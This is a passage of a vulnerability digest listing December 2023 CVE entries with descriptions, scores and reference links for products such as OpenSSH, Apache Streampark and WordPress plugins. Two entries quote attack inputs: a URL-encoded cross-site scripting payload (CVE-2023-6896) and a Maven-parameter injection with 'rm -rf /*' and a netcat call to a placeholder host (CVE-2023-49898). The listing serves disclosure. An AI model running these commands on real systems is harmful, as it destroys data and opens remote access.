HCL Connections is vulnerable to an information disclosure vulnerability which could allow a user to obtain sensitive information they are not entitled to, caused by improper handling of request data.

CVE ID : CVE-2023-28022
Source : psirt@hcl.com
CVSS Score : 3.5

References :
https://support.hcltechsw.com/csm?id=kb_article&sysparm_article=KB0108433 | source : psirt@hcl.com


Source : vuldb.com

Vulnerability ID : CVE-2023-6896

First published on : 17-12-2023 10:15:08
Last modified on : 18-12-2023 14:05:22

Description :
A vulnerability was found in SourceCodester Simple Image Stack Website 1.0. It has been rated as problematic. This issue affects some unknown processing. The manipulation of the argument search with the input sy2ap%22%3e%3cscript%3ealert(1)%3c%2fscript%3etkxh1 leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-248255.

CVE ID : CVE-2023-6896
Source : cna@vuldb.com
CVSS Score : 3.5

References :
https://vuldb.com/?ctiid.248255 | source : cna@vuldb.com
https://vuldb.com/?id.248255 | source : cna@vuldb.com
https://www.yuque.com/u39434519/pfhiwd/vry762ncuczem3yi?singleDoc# | source : cna@vuldb.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-6908

First published on : 18-12-2023 04:15:52
Last modified on : 18-12-2023 14:05:17

Description :
A vulnerability, which was classified as problematic, was found in DFIRKuiper Kuiper 2.3.4. This affects the function unzip_file of the file kuiper/app/controllers/case_management.py of the component TAR Archive Handler. The manipulation of the argument dst_path leads to path traversal. It is possible to initiate the attack remotely. The complexity of an attack is rather high. Exploitation is said to be difficult. Upgrading to version 2.3.5 addresses this issue. The identifier of the patch is 94fa135153002f651f5526c55a7240e083db8d73. It is recommended to upgrade the affected component. The identifier VDB-248277 was assigned to this vulnerability.

CVE ID : CVE-2023-6908
Source : cna@vuldb.com
CVSS Score : 3.1

References :
https://github.com/DFIRKuiper/Kuiper/commit/94fa135153002f651f5526c55a7240e083db8d73 | source : cna@vuldb.com
https://github.com/DFIRKuiper/Kuiper/pull/106 | source : cna@vuldb.com
https://github.com/DFIRKuiper/Kuiper/releases/tag/v2.3.5 | source : cna@vuldb.com
https://vuldb.com/?ctiid.248277 | source : cna@vuldb.com
https://vuldb.com/?id.248277 | source : cna@vuldb.com

Vulnerability : CWE-22


Source : gallagher.com

Vulnerability ID : CVE-2023-22439

First published on : 18-12-2023 22:15:07
Last modified on : 18-12-2023 22:15:07

Description :
Improper input validation of a large HTTP request in the Controller 6000 and Controller 7000 optional diagnostic web interface (Port 80) can be used to perform a Denial of Service of the diagnostic web interface. This issue affects: Gallagher Controller 6000 and 7000 8.90 prior to vCR8.90.231204a (distributed in 8.90.1620 (MR2)), 8.80 prior to vCR8.80.231204a (distributed in 8.80.1369 (MR3)), 8.70 prior to vCR8.70.231204a (distributed in 8.70.2375 (MR5)), 8.60 prior to vCR8.60.231116a (distributed in 8.60.2550 (MR7)), all versions of 8.50 and prior.

CVE ID : CVE-2023-22439
Source : disclosures@gallagher.com
CVSS Score : 3.1

References :
https://security.gallagher.com/Security-Advisories/CVE-2023-22439 | source : disclosures@gallagher.com

Vulnerability : CWE-20


Vulnerability ID : CVE-2023-41967

First published on : 18-12-2023 22:15:08
Last modified on : 18-12-2023 22:15:08

Description :
Sensitive information uncleared after debug/power state transition in the Controller 6000 could be abused by an attacker with knowledge of the Controller's default diagnostic password and physical access to the Controller to view its configuration through the diagnostic web pages. This issue affects: Gallagher Controller 6000 8.70 prior to vCR8.70.231204a (distributed in 8.70.2375 (MR5)), v8.60 or earlier.

CVE ID : CVE-2023-41967
Source : disclosures@gallagher.com
CVSS Score : 2.4

References :
https://security.gallagher.com/Security-Advisories/CVE-2023-41967 | source : disclosures@gallagher.com

Vulnerability : CWE-1272


Source : gitlab.com

Vulnerability ID : CVE-2023-3511

First published on : 15-12-2023 16:15:43
Last modified on : 15-12-2023 16:53:06

Description :
An issue has been discovered in GitLab EE affecting all versions starting from 8.17 before 16.4.4, all versions starting from 16.5 before 16.5.4, all versions starting from 16.6 before 16.6.2. It was possible for auditor users to fork and submit merge requests to private projects they're not a member of.

CVE ID : CVE-2023-3511
Source : cve@gitlab.com
CVSS Score : 2.0

References :
https://gitlab.com/gitlab-org/gitlab/-/issues/416961 | source : cve@gitlab.com
https://hackerone.com/reports/2046752 | source : cve@gitlab.com

Vulnerability : CWE-284


(44) NO SCORE VULNERABILITIES [0.0, 0.0]

Source : mitre.org

Vulnerability ID : CVE-2023-48049

First published on : 15-12-2023 00:15:42
Last modified on : 15-12-2023 13:42:13

Description :
A SQL injection vulnerability in Cybrosys Techno Solutions Website Blog Search (aka website_search_blog) v. 13.0 through 13.0.1.0.1 allows a remote attacker to execute arbitrary code and to gain privileges via the name parameter in the controllers/main.py component.

CVE ID : CVE-2023-48049
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/luvsn/OdZoo/tree/main/exploits/website_search_blog | source : cve@mitre.org


Vulnerability ID : CVE-2023-40954

First published on : 15-12-2023 01:15:07
Last modified on : 15-12-2023 13:42:13

Description :
A SQL injection vulnerability in Grzegorz Marczynski Dynamic Progress Bar (aka web_progress) v. 11.0 through 11.0.2, v12.0 through v12.0.2, v.13.0 through v13.0.2, v.14.0 through v14.0.2.1, v.15.0 through v15.0.2, and v16.0 through v16.0.2.1 allows a remote attacker to gain privileges via the recency parameter in the models/web_progress.py component.

CVE ID : CVE-2023-40954
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/gmarczynski/odoo-web-progress/commit/3c867f1cf7447449c81b1aa24ebb1f7ae757489f | source : cve@mitre.org
https://github.com/luvsn/OdZoo/tree/main/exploits/web_progress | source : cve@mitre.org


Vulnerability ID : CVE-2023-42183

First published on : 15-12-2023 01:15:08
Last modified on : 15-12-2023 13:42:13

Description :
lockss-daemon (aka Classic LOCKSS Daemon) before 1.77.3 performs post-Unicode normalization, which may allow bypass of intended access restrictions, such as when U+1FEF is converted to a backtick.

CVE ID : CVE-2023-42183
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/lockss/lockss-daemon/security/advisories/GHSA-mgqj-hphf-9588 | source : cve@mitre.org


Vulnerability ID : CVE-2023-48050

First published on : 15-12-2023 01:15:08
Last modified on : 15-12-2023 13:42:13

Description :
SQL injection vulnerability in Cams Biometrics Zkteco, eSSL, Cams Biometrics Integration Module with HR Attendance (aka odoo-biometric-attendance) v. 13.0 through 16.0.1 allows a remote attacker to execute arbitrary code and to gain privileges via the db parameter in the controllers/controllers.py component.

CVE ID : CVE-2023-48050
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/luvsn/OdZoo/tree/main/exploits/odoo-biometric-attendance | source : cve@mitre.org


Vulnerability ID : CVE-2023-50089

First published on : 15-12-2023 17:15:12
Last modified on : 15-12-2023 20:09:58

Description :
A Command Injection vulnerability exists in NETGEAR WNR2000v4 version 1.0.0.70. When using HTTP for SOAP authentication, command execution occurs during the process after successful authentication.

CVE ID : CVE-2023-50089
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/NoneShell/Vulnerabilities/blob/main/NETGEAR/WNR2000v4-1.0.0.70-Authorized-Command-Injection.md | source : cve@mitre.org
https://www.netgear.com/about/security/ | source : cve@mitre.org


Vulnerability ID : CVE-2023-50917

First published on : 15-12-2023 17:15:12
Last modified on : 15-12-2023 20:09:58

Description :
MajorDoMo (aka Major Domestic Module) before 0662e5e allows command execution via thumb.php shell metacharacters. NOTE: this is unrelated to the Majordomo mailing-list manager.

CVE ID : CVE-2023-50917
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/sergejey/majordomo/commit/0662e5ebfb133445ff6154b69c61019357092178 | source : cve@mitre.org
https://github.com/sergejey/majordomo/commit/3ec3ffb863ea3c2661ab27d398776c551f4daaac | source : cve@mitre.org


Vulnerability ID : CVE-2023-50918

First published on : 15-12-2023 18:15:07
Last modified on : 15-12-2023 20:09:58

Description :
app/Controller/AuditLogsController.php in MISP before 2.4.182 mishandles ACLs for audit logs.

CVE ID : CVE-2023-50918
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/MISP/MISP/commit/92888b1376246c0f20c256aaa3c57b6f12115fa1 | source : cve@mitre.org
https://github.com/MISP/MISP/compare/v2.4.181...v2.4.182 | source : cve@mitre.org


Vulnerability ID : CVE-2023-50469

First published on : 15-12-2023 21:15:09
Last modified on : 18-12-2023 14:05:33

Description :
Shenzhen Libituo Technology Co., Ltd LBT-T300-T310 v2.2.2.6 was discovered to contain a buffer overflow via the ApCliEncrypType parameter at /apply.cgi.

CVE ID : CVE-2023-50469
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/forever-more-cjy/overflow/blob/main/LBT-T310%20Buffer%20overflow.md | source : cve@mitre.org


Vulnerability ID : CVE-2020-17483

First published on : 16-12-2023 01:15:07
Last modified on : 18-12-2023 14:05:33

Description :
An improper access control vulnerability exists in all versions of Uffizio's GPS Tracker that leads to sensitive information disclosure of all the connected devices. By visiting the vulnerable host at port 9000, we see it responds with a JSON body that has all the details about the devices which have been deployed.

CVE ID : CVE-2020-17483
Source : cve@mitre.org
CVSS Score : /

References :
https://www.cisa.gov/news-events/ics-advisories/icsa-21-287-02 | source : cve@mitre.org
https://www.uffizio.com/ | source : cve@mitre.org


Vulnerability ID : CVE-2020-17484

First published on : 16-12-2023 01:15:07
Last modified on : 18-12-2023 14:05:33

Description :
An Open Redirection vulnerability in all versions of Uffizio's GPS Tracker allows an attacker to construct a URL within the application that causes a redirection to an arbitrary external domain.

CVE ID : CVE-2020-17484
Source : cve@mitre.org
CVSS Score : /

References :
https://www.cisa.gov/news-events/ics-advisories/icsa-21-287-02 | source : cve@mitre.org
https://www.uffizio.com/ | source : cve@mitre.org


Vulnerability ID : CVE-2020-17485

First published on : 16-12-2023 01:15:07
Last modified on : 18-12-2023 14:05:33

Description :
A Remote Code Execution vulnerability exists in all versions of Uffizio's GPS Tracker. The web server can be compromised by uploading and executing a web/reverse shell. An attacker could then run commands, browse system files, and browse local resources.

CVE ID : CVE-2020-17485
Source : cve@mitre.org
CVSS Score : /

References :
https://www.cisa.gov/news-events/ics-advisories/icsa-21-287-02 | source : cve@mitre.org
https://www.uffizio.com/ | source : cve@mitre.org


Vulnerability ID : CVE-2021-42796

First published on : 16-12-2023 01:15:07
Last modified on : 18-12-2023 14:05:33

Description :
An issue was discovered in ExecuteCommand() in AVEVA Edge (formerly InduSoft Web Studio) versions R2020 and prior that allows unauthenticated arbitrary commands to be executed.

CVE ID : CVE-2021-42796
Source : cve@mitre.org
CVSS Score : /

References :
https://www.aveva.com/en/products/edge/ | source : cve@mitre.org
https://www.cisa.gov/news-events/ics-advisories/icsa-22-326-01 | source : cve@mitre.org


Vulnerability ID : CVE-2021-42797

First published on : 16-12-2023 01:15:07
Last modified on : 18-12-2023 14:05:33

Description :
Path traversal vulnerability in AVEVA Edge (formerly InduSoft Web Studio) versions R2020 and prior allows an unauthenticated user to steal the Windows access token of the user account configured for accessing external DB resources.

CVE ID : CVE-2021-42797
Source : cve@mitre.org
CVSS Score : /

References :
https://www.aveva.com/en/products/edge/ | source : cve@mitre.org
https://www.cisa.gov/news-events/ics-advisories/icsa-22-326-01 | source : cve@mitre.org


Vulnerability ID : CVE-2022-24351

First published on : 16-12-2023 02:15:07
Last modified on : 18-12-2023 14:05:33

Description :
TOCTOU race-condition vulnerability in Insyde InsydeH2O with Kernel 5.2 before version 05.27.29, Kernel 5.3 before version 05.36.29, Kernel 5.4 before version 05.44.13, and Kernel 5.5 before version 05.52.13 allows an attacker to alter data and code used by the remainder of the boot process.

CVE ID : CVE-2022-24351
Source : cve@mitre.org
CVSS Score : /

References :
https://www.insyde.com/security-pledge | source : cve@mitre.org
https://www.insyde.com/security-pledge/SA-2023038 | source : cve@mitre.org


Vulnerability ID : CVE-2023-31813

First published on : 16-12-2023 02:15:07
Last modified on : 16-12-2023 02:15:07

Description :
Rejected reason: DO NOT USE THIS CVE RECORD. ConsultIDs: CVE-2023-2804. Reason: This record is a duplicate of CVE-2023-2804. Notes: All CVE users should reference CVE-2023-2804 instead of this record. All references and descriptions in this record have been removed to prevent accidental usage.

CVE ID : CVE-2023-31813
Source : cve@mitre.org
CVSS Score : /

References :


Vulnerability ID : CVE-2023-50784

First published on : 16-12-2023 23:15:40
Last modified on : 18-12-2023 14:05:28

Description :
A buffer overflow in websockets in UnrealIRCd 6.1.0 through 6.1.3 before 6.1.4 allows an unauthenticated remote attacker to crash the server by sending an oversized packet (if a websocket port is open). Remote code execution might be possible on some uncommon, older platforms.

CVE ID : CVE-2023-50784
Source : cve@mitre.org
CVSS Score : /

References :
https://forums.unrealircd.org/viewtopic.php?t=9340 | source : cve@mitre.org
https://www.unrealircd.org/index/news | source : cve@mitre.org


Vulnerability ID : CVE-2023-50965

First published on : 17-12-2023 02:15:21
Last modified on : 18-12-2023 14:05:28

Description :
In MicroHttpServer (aka Micro HTTP Server) through 4398570, _ReadStaticFiles in lib/middleware.c allows a stack-based buffer overflow and potentially remote code execution via a long URI.

CVE ID : CVE-2023-50965
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/starnight/MicroHttpServer/issues/5 | source : cve@mitre.org
https://github.com/starnight/MicroHttpServer/tree/43985708ef5fe7677392c54e229bd22e136c2665 | source : cve@mitre.org


Vulnerability ID : CVE-2023-50976

First published on : 18-12-2023 00:15:11
Last modified on : 18-12-2023 14:05:22

Description :
Redpanda before 23.1.21 and 23.2.x before 23.2.18 has missing authorization checks in the Transactions API.

CVE ID : CVE-2023-50976
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/redpanda-data/redpanda/compare/v23.1.20...v23.1.21 | source : cve@mitre.org
https://github.com/redpanda-data/redpanda/compare/v23.2.17...v23.2.18 | source : cve@mitre.org
https://github.com/redpanda-data/redpanda/issues/15048 | source : cve@mitre.org
https://github.com/redpanda-data/redpanda/pull/14969 | source : cve@mitre.org
https://github.com/redpanda-data/redpanda/pull/15060 | source : cve@mitre.org


Vulnerability ID : CVE-2023-50979

First published on : 18-12-2023 04:15:50
Last modified on : 18-12-2023 14:05:22

Description :
Crypto++ (aka cryptopp) through 8.9.0 has a Marvin side channel during decryption with PKCS#1 v1.5 padding.

CVE ID : CVE-2023-50979
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/weidai11/cryptopp/issues/1247 | source : cve@mitre.org


Vulnerability ID : CVE-2023-50980

First published on : 18-12-2023 04:15:51
Last modified on : 18-12-2023 14:05:22

Description :
gf2n.cpp in Crypto++ (aka cryptopp) through 8.9.0 allows attackers to cause a denial of service (application crash) via DER public-key data for an F(2^m) curve, if the degree of each term in the polynomial is not strictly decreasing.

CVE ID : CVE-2023-50980
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/weidai11/cryptopp/issues/1248 | source : cve@mitre.org


Vulnerability ID : CVE-2023-50981

First published on : 18-12-2023 04:15:51
Last modified on : 18-12-2023 14:05:17

Description :
ModularSquareRoot in Crypto++ (aka cryptopp) through 8.9.0 allows attackers to cause a denial of service (infinite loop) via crafted DER public-key data associated with squared odd numbers, such as the square of 268995137513890432434389773128616504853.

CVE ID : CVE-2023-50981
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/weidai11/cryptopp/issues/1249 | source : cve@mitre.org


Vulnerability ID : CVE-2023-48795

First published on : 18-12-2023 16:15:10
Last modified on : 18-12-2023 21:15:08

Description :
The SSH transport protocol with certain OpenSSH extensions, found in OpenSSH before 9.6 and other products, allows remote attackers to bypass integrity checks such that some packets are omitted (from the extension negotiation message), and a client and server may consequently end up with a connection for which some security features have been downgraded or disabled, aka a Terrapin attack. This occurs because the SSH Binary Packet Protocol (BPP), implemented by these extensions, mishandles the handshake phase and mishandles use of sequence numbers. For example, there is an effective attack against SSH's use of ChaCha20-Poly1305 (and CBC with Encrypt-then-MAC). The bypass occurs in chacha20-poly1305@openssh.com and (if CBC is used) the -etm@openssh.com MAC algorithms. This also affects Maverick Synergy Java SSH API before 3.1.0-SNAPSHOT, Dropbear through 2022.83, Ssh before 5.1.1 in Erlang/OTP, PuTTY before 0.80, AsyncSSH before 2.14.2, golang.org/x/crypto before 0.17.0, and libssh before 0.10.6; and there could be effects on Bitvise SSH through 9.31.

CVE ID : CVE-2023-48795
Source : cve@mitre.org
CVSS Score : /

References :
http://www.openwall.com/lists/oss-security/2023/12/18/3 | source : cve@mitre.org
https://access.redhat.com/security/cve/cve-2023-48795 | source : cve@mitre.org
https://bugs.gentoo.org/920280 | source : cve@mitre.org
https://bugzilla.redhat.com/show_bug.cgi?id=2254210 | source : cve@mitre.org
https://bugzilla.suse.com/show_bug.cgi?id=1217950 | source : cve@mitre.org
https://git.libssh.org/projects/libssh.git/commit/?h=stable-0.10&id=10e09e273f69e149389b3e0e5d44b8c221c2e7f6 | source : cve@mitre.org
https://github.com/TeraTermProject/teraterm/commit/7279fbd6ef4d0c8bdd6a90af4ada2899d786eec0 | source : cve@mitre.org
https://github.com/advisories/GHSA-45x7-px36-x8w8 | source : cve@mitre.org
https://github.com/drakkan/sftpgo/releases/tag/v2.5.6 | source : cve@mitre.org
https://github.com/erlang/otp/blob/d1b43dc0f1361d2ad67601169e90a7fc50bb0369/lib/ssh/doc/src/notes.xml#L39-L42 | source : cve@mitre.org
https://github.com/erlang/otp/releases/tag/OTP-26.2.1 | source : cve@mitre.org
https://github.com/golang/crypto/commit/9d2ee975ef9fe627bf0a6f01c1f69e8ef1d4f05d | source : cve@mitre.org
https://github.com/mkj/dropbear/blob/17657c36cce6df7716d5ff151ec09a665382d5dd/CHANGES#L25 | source : cve@mitre.org
https://github.com/mwiede/jsch/issues/457 | source : cve@mitre.org
https://github.com/mwiede/jsch/pull/461 | source : cve@mitre.org
https://github.com/openssh/openssh-portable/commits/master | source : cve@mitre.org
https://github.com/paramiko/paramiko/issues/2337 | source : cve@mitre.org
https://github.com/ronf/asyncssh/blob/develop/docs/changes.rst | source : cve@mitre.org
https://github.com/ronf/asyncssh/tags | source : cve@mitre.org
https://github.com/warp-tech/russh/releases/tag/v0.40.2 | source : cve@mitre.org
https://gitlab.com/libssh/libssh-mirror/-/tags | source : cve@mitre.org
https://groups.google.com/g/golang-announce/c/-n5WqVC18LQ | source : cve@mitre.org
https://groups.google.com/g/golang-announce/c/qA3XtxvMUyg | source : cve@mitre.org
https://jadaptive.com/important-java-ssh-security-update-new-ssh-vulnerability-discovered-cve-2023-48795/ | source : cve@mitre.org
https://matt.ucc.asn.au/dropbear/CHANGES | source : cve@mitre.org
https://news.ycombinator.com/item?id=38684904 | source : cve@mitre.org
https://news.ycombinator.com/item?id=38685286 | source : cve@mitre.org
https://security-tracker.debian.org/tracker/CVE-2023-48795 | source : cve@mitre.org
https://security-tracker.debian.org/tracker/source-package/libssh2 | source : cve@mitre.org
https://security-tracker.debian.org/tracker/source-package/proftpd-dfsg | source : cve@mitre.org
https://thorntech.com/cve-2023-48795-and-sftp-gateway/ | source : cve@mitre.org
https://twitter.com/TrueSkrillor/status/1736774389725565005 | source : cve@mitre.org
https://ubuntu.com/security/CVE-2023-48795 | source : cve@mitre.org
https://www.bitvise.com/ssh-server-version-history | source : cve@mitre.org
https://www.chiark.greenend.org.uk/~sgtatham/putty/changes.html | source : cve@mitre.org
https://www.openssh.com/openbsd.html | source : cve@mitre.org
https://www.openssh.com/txt/release-9.6 | source : cve@mitre.org
https://www.openwall.com/lists/oss-security/2023/12/18/2 | source : cve@mitre.org
https://www.reddit.com/r/sysadmin/comments/18idv52/cve202348795_why_is_this_cve_still_undisclosed/ | source : cve@mitre.org
https://www.suse.com/c/suse-addresses-the-ssh-v2-protocol-terrapin-attack-aka-cve-2023-48795/ | source : cve@mitre.org
https://www.terrapin-attack.com | source : cve@mitre.org


Vulnerability ID : CVE-2023-51384

First published on : 18-12-2023 19:15:08
Last modified on : 18-12-2023 20:21:38

Description :
In ssh-agent in OpenSSH before 9.6, certain destination constraints can be incompletely applied. When destination constraints are specified during addition of PKCS#11-hosted private keys, these constraints are only applied to the first key, even if a PKCS#11 token returns multiple keys.

CVE ID : CVE-2023-51384
Source : cve@mitre.org
CVSS Score : /

References :
https://www.openssh.com/txt/release-9.6 | source : cve@mitre.org
https://www.openwall.com/lists/oss-security/2023/12/18/2 | source : cve@mitre.org


Vulnerability ID : CVE-2023-51385

First published on : 18-12-2023 19:15:08
Last modified on : 18-12-2023 20:21:38

Description :
In ssh in OpenSSH before 9.6, OS command injection might occur if a user name or host name has shell metacharacters, and this name is referenced by an expansion token in certain situations. For example, an untrusted Git repository can have a submodule with shell metacharacters in a user name or host name.

CVE ID : CVE-2023-51385
Source : cve@mitre.org
CVSS Score : /

References :
https://www.openssh.com/txt/release-9.6 | source : cve@mitre.org
https://www.openwall.com/lists/oss-security/2023/12/18/2 | source : cve@mitre.org


Source : apache.org

Vulnerability ID : CVE-2023-29234

First published on : 15-12-2023 09:15:07
Last modified on : 15-12-2023 13:42:13

Description :
A deserialization vulnerability existed when decoding a malicious package. This issue affects Apache Dubbo: from 3.1.0 through 3.1.10, from 3.2.0 through 3.2.4. Users are recommended to upgrade to the latest version, which fixes the issue.

CVE ID : CVE-2023-29234
Source : security@apache.org
CVSS Score : /

References :
http://www.openwall.com/lists/oss-security/2023/12/15/2 | source : security@apache.org
https://lists.apache.org/thread/wb2df2whkdnbgp54nnqn0m94rllx8f77 | source : security@apache.org

Vulnerability : CWE-502


Vulnerability ID : CVE-2023-46279

First published on : 15-12-2023 09:15:07
Last modified on : 15-12-2023 13:42:13

Description :
Deserialization of Untrusted Data vulnerability in Apache Dubbo. This issue only affects Apache Dubbo 3.1.5. Users are recommended to upgrade to the latest version, which fixes the issue.

CVE ID : CVE-2023-46279
Source : security@apache.org
CVSS Score : /

References :
http://www.openwall.com/lists/oss-security/2023/12/15/3 | source : security@apache.org
https://lists.apache.org/thread/zw53nxrkrfswmk9n3sfwxmcj7x030nmo | source : security@apache.org

Vulnerability : CWE-502


Vulnerability ID : CVE-2023-30867

First published on : 15-12-2023 13:15:07
Last modified on : 15-12-2023 13:41:51

Description :
In the Streampark platform, when users log in to the system and use certain features, some pages provide a name-based fuzzy search, such as job names, role names, etc. The SQL syntax is: select * from table where jobName like '%jobName%'. However, the jobName field may receive illegal parameters, leading to SQL injection. This could potentially result in information leakage. Mitigation: Users are recommended to upgrade to version 2.1.2, which fixes the issue.

CVE ID : CVE-2023-30867
Source : security@apache.org
CVSS Score : /

References :
https://lists.apache.org/thread/bhdzh6hnh04yyf3g203bbyvxryd720o2 | source : security@apache.org

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-49898

First published on : 15-12-2023 13:15:07
Last modified on : 15-12-2023 13:41:51

Description :
In streampark, there is a project module that integrates Maven's compilation capability. However, there is no check on the compilation parameters of Maven, allowing attackers to insert commands for remote command execution. The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low. Mitigation: all users should upgrade to 2.1.2. Example: ##You can customize the splicing method according to the compilation situation of the project, mvn compilation results use &&, compilation failure use "||" or "&&": /usr/share/java/maven-3/conf/settings.xml || rm -rf /* /usr/share/java/maven-3/conf/settings.xml && nohup nc x.x.x.x 8899 &

CVE ID : CVE-2023-49898
Source : security@apache.org
CVSS Score : /

References :
https://lists.apache.org/thread/qj99c03r4td35f8gbxq084b8qmv2fyr3 | source : security@apache.org

Vulnerability : CWE-77


Vulnerability ID : CVE-2023-41314

First published on : 18-12-2023 09:15:05
Last modified on : 18-12-2023 14:05:17

Description :
The APIs /api/snapshot and /api/get_log_file allow unauthenticated access. This could allow a DoS attack or retrieval of arbitrary files from the FE node. Please upgrade to 2.0.3 to fix these issues.

CVE ID : CVE-2023-41314
Source : security@apache.org
CVSS Score : /

References :
https://lists.apache.org/thread/tgvpvz3yw7zgodl1sb3sv3jbbz8t5zb4 | source : security@apache.org

Vulnerability : CWE-863


Source : redhat.com

Vulnerability ID : CVE-2023-6920

First published on : 18-12-2023 17:15:11
Last modified on : 18-12-2023 17:15:11

Description :
Rejected reason: This flaw was found to be a duplicate of CVE-2023-6927. Please see https://access.redhat.com/security/cve/CVE-2023-6927 for information about affected products and security errata.

CVE ID : CVE-2023-6920
Source : secalert@redhat.com
CVSS Score : /

References :


Source : wpscan.com

Vulnerability ID : CVE-2023-4311

First published on : 18-12-2023 20:15:08
Last modified on : 18-12-2023 20:21:38

Description :
The Vrm 360 3D Model Viewer WordPress plugin through 1.2.1 is vulnerable to arbitrary file upload due to insufficient checks in a plugin shortcode.

CVE ID : CVE-2023-4311
Source : contact@wpscan.com
CVSS Score : /

References :
https://wpscan.com/vulnerability/21950116-1a69-4848-9da0-e912096c0fce | source : contact@wpscan.com


Vulnerability ID : CVE-2023-4724

First published on : 18-12-2023 20:15:08
Last modified on : 18-12-2023 20:21:38

Description :
The Export any WordPress data to XML/CSV WordPress plugin before 1.4.0, WP All Export Pro WordPress plugin before 1.8.6 does not validate and sanitise the `wp_query` parameter, which allows an attacker to run arbitrary commands on the remote server.

CVE ID : CVE-2023-4724
Source : contact@wpscan.com
CVSS Score : /

References :
https://wpscan.com/vulnerability/48820f1d-45cb-4f1f-990d-d132bfc5536f | source : contact@wpscan.com


Vulnerability ID : CVE-2023-5005

First published on : 18-12-2023 20:15:08
Last modified on : 18-12-2023 20:21:38

Description :
The Autocomplete Location field Contact Form 7 WordPress plugin before 3.0, autocomplete-location-field-contact-form-7-pro WordPress plugin before 2.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)

CVE ID : CVE-2023-5005
Source : contact@wpscan.com
CVSS Score : /

References :
https://wpscan.com/vulnerability/bfb174d4-7658-4883-a682-d06bda89ec44 | source : contact@wpscan.com


Vulnerability ID : CVE-2023-5348

First published on : 18-12-2023 20:15:08
Last modified on : 18-12-2023 20:21:38

Description :
The Product Catalog Mode For WooCommerce WordPress plugin before 5.0.3 does not properly authorize settings updates or escape settings values, leading to stored XSS by unauthenticated users.

CVE ID : CVE-2023-5348
Source : contact@wpscan.com
CVSS Score : /

References :
https://wpscan.com/vulnerability/b37b09c1-1b53-471c-9b10-7d2d05ae11f1 | source : contact@wpscan.com


Vulnerability ID : CVE-2023-5882

First published on : 18-12-2023 20:15:08
Last modified on : 18-12-2023 20:21:38

Description :
The Export any WordPress data to XML/CSV WordPress plugin before 1.4.0, WP All Export Pro WordPress plugin before 1.8.6 does not check nonce tokens early enough in the request lifecycle, allowing attackers to make logged in users perform unwanted actions leading to remote code execution.

CVE ID : CVE-2023-5882
Source : contact@wpscan.com
CVSS Score : /

References :
https://wpscan.com/vulnerability/72be4b5c-21be-46af-a3f4-08b4c190a7e2 | source : contact@wpscan.com


Vulnerability ID : CVE-2023-5886

First published on : 18-12-2023 20:15:08
Last modified on : 18-12-2023 20:21:38

Description :
The Export any WordPress data to XML/CSV WordPress plugin before 1.4.0, WP All Export Pro WordPress plugin before 1.8.6 does not check nonce tokens early enough in the request lifecycle, allowing attackers with the ability to upload files to make logged in users perform unwanted actions leading to PHAR deserialization, which may lead to remote code execution.

CVE ID : CVE-2023-5886
Source : contact@wpscan.com
CVSS Score : /

References :
https://wpscan.com/vulnerability/0a08e49d-d34e-4140-a15d-ad64444665a3 | source : contact@wpscan.com


Vulnerability ID : CVE-2023-5949

First published on : 18-12-2023 20:15:08
Last modified on : 18-12-2023 20:21:38

Description :
The SmartCrawl WordPress plugin before 3.8.3 does not prevent unauthorised users from accessing password-protected posts' content.

CVE ID : CVE-2023-5949
Source : contact@wpscan.com
CVSS Score : /

References :
https://wpscan.com/vulnerability/3cec27ca-f470-402d-ae3e-271cb59cf407 | source : contact@wpscan.com


Vulnerability ID : CVE-2023-6065

First published on : 18-12-2023 20:15:08
Last modified on : 18-12-2023 20:21:38

Description :
The Quttera Web Malware Scanner WordPress plugin before 3.4.2.1 doesn't restrict access to detailed scan logs, which allows a malicious actor to discover local paths and portions of the site's code

CVE ID : CVE-2023-6065
Source : contact@wpscan.com
CVSS Score : /

References :
https://drive.google.com/file/d/1w83xWsVLS_gCpQy4LDwbjNK9JaB87EEf/view?usp=sharing | source : contact@wpscan.com
https://wpscan.com/vulnerability/64f2557f-c5e4-4779-9e28-911dfaf2dda5 | source : contact@wpscan.com


Vulnerability ID : CVE-2023-6077

First published on : 18-12-2023 20:15:08
Last modified on : 18-12-2023 20:21:38

Description :
The Slider WordPress plugin before 3.5.12 does not ensure that posts to be accessed via an AJAX action are slides and can be viewed by the user making the request, allowing any authenticated user, such as a subscriber, to access the content of arbitrary posts, such as private, draft and password-protected ones.

CVE ID : CVE-2023-6077
Source : contact@wpscan.com
CVSS Score : /

References :
https://wpscan.com/vulnerability/1afc0e4a-f712-47d4-bf29-7719ccbbbb1b | source : contact@wpscan.com


Vulnerability ID : CVE-2023-6203

First published on : 18-12-2023 20:15:08
Last modified on : 18-12-2023 20:21:38

Description :
The Events Calendar WordPress plugin before 6.2.8.1 discloses the content of password protected posts to unauthenticated users via a crafted request

CVE ID : CVE-2023-6203
Source : contact@wpscan.com
CVSS Score : /

References :
https://wpscan.com/vulnerability/229273e6-e849-447f-a95a-0730969ecdae | source : contact@wpscan.com


Vulnerability ID : CVE-2023-6222

First published on : 18-12-2023 20:15:08
Last modified on : 18-12-2023 20:21:38

Description :
The Quttera Web Malware Scanner WordPress plugin before 3.4.2.1 does not validate user input used in a path, which could allow users with an admin role to perform path traversal attacks.

CVE ID : CVE-2023-6222
Source : contact@wpscan.com
CVSS Score : /

References :
https://drive.google.com/file/d/1krgHH2NvVFr93VpErLkOjDV3L6M5yIA1/view?usp=sharing | source : contact@wpscan.com
